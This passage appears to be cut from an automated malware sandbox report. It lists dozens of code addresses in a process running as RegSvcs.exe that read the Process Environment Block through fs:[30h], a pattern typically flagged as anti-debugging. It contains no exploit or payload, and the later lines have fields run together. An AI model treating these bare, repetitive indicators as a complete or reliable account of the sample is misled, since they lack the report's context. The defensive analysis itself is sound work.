          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72582 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A580 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A580 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A49A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78550 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78550 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF06F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF06F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA6C7 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA66B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC6A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA2674 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101678E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010247A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA6620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7262C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E627 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2619 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE609 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F747FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F747FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE7E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7C7C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF07C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F707AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103866E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103866E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE75D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF4755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A740 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA674D mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA674D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA674D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA273C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEC730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC700 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0100892B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044940 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70887 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01014978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01014978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F82840 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010069C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103A9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA29F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA29F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA49D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF89B3 mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF89B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF89B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F709AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F709AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC97C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF0946 mov eax, dword ptr fs:[00000030h]8_2_00FF0946
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010408C0 mov eax, dword ptr fs:[00000030h]8_2_010408C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF892A mov eax, dword ptr fs:[00000030h]8_2_00FF892A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A8E4 mov eax, dword ptr fs:[00000030h]8_2_0103A8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFC912 mov eax, dword ptr fs:[00000030h]8_2_00FFC912
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68918 mov eax, dword ptr fs:[00000030h]8_2_00F68918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68918 mov eax, dword ptr fs:[00000030h]8_2_00F68918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE908 mov eax, dword ptr fs:[00000030h]8_2_00FEE908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE908 mov eax, dword ptr fs:[00000030h]8_2_00FEE908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044B00 mov eax, dword ptr fs:[00000030h]8_2_01044B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAAAEE mov eax, dword ptr fs:[00000030h]8_2_00FAAAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAAAEE mov eax, dword ptr fs:[00000030h]8_2_00FAAAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F70AD0 mov eax, dword ptr fs:[00000030h]8_2_00F70AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA4AD0 mov eax, dword ptr fs:[00000030h]8_2_00FA4AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA4AD0 mov eax, dword ptr fs:[00000030h]8_2_00FA4AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01038B28 mov eax, dword ptr fs:[00000030h]8_2_01038B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01038B28 mov eax, dword ptr fs:[00000030h]8_2_01038B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h]8_2_00FC6ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h]8_2_00FC6ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h]8_2_00FC6ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01006B40 mov eax, dword ptr fs:[00000030h]8_2_01006B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01006B40 mov eax, dword ptr fs:[00000030h]8_2_01006B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103AB40 mov eax, dword ptr fs:[00000030h]8_2_0103AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01018B42 mov eax, dword ptr fs:[00000030h]8_2_01018B42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024B4B mov eax, dword ptr fs:[00000030h]8_2_01024B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024B4B mov eax, dword ptr fs:[00000030h]8_2_01024B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101EB50 mov eax, dword ptr fs:[00000030h]8_2_0101EB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h]8_2_01042B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h]8_2_01042B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h]8_2_01042B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h]8_2_01042B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78AA0 mov eax, dword ptr fs:[00000030h]8_2_00F78AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78AA0 mov eax, dword ptr fs:[00000030h]8_2_00F78AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC6AA4 mov eax, dword ptr fs:[00000030h]8_2_00FC6AA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA8A90 mov edx, dword ptr fs:[00000030h]8_2_00FA8A90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6EA80 mov eax, dword ptr fs:[00000030h]8_2_00F6EA80
